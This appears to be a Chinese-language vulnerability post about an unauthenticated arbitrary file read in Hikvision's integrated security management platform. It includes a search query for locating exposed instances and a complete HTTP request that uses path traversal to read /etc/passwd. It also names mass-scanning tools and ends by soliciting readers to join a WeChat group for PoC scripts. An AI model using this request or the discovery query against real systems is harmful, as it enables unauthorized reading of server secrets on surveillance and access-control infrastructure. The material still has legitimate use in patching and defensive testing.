0x01 產品簡介

海康威視綜合安防管理平臺是一套“集成化”、“智能化”的平臺,通過接入視頻監控、一卡通、停車場、報警檢測等系統的設備。海康威視集成化綜合管理軟件平臺,可以對接入的視頻監控點集中管理,實現統一部署、統一配置、統一管理和統一調度。

0x02 漏洞概述

海康威視綜合安防管理平臺/orgManage/v1/orgs/download 接口處存在任意 文件讀取漏洞，未經身份驗證的遠程攻擊者可利用目錄遍歷的方式繞過權限認證直接讀取后臺服務器配置文件等敏感文件，造成信息泄露，使系統處于極不安全的狀態。

0x03 搜索語法

title="綜合安防管理平臺"

0x04 漏洞復現

GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

0x05 工具批量

nuclei

afrog

xray

POC腳本獲取

請使用VX掃一掃加入內部POC腳本分享圈子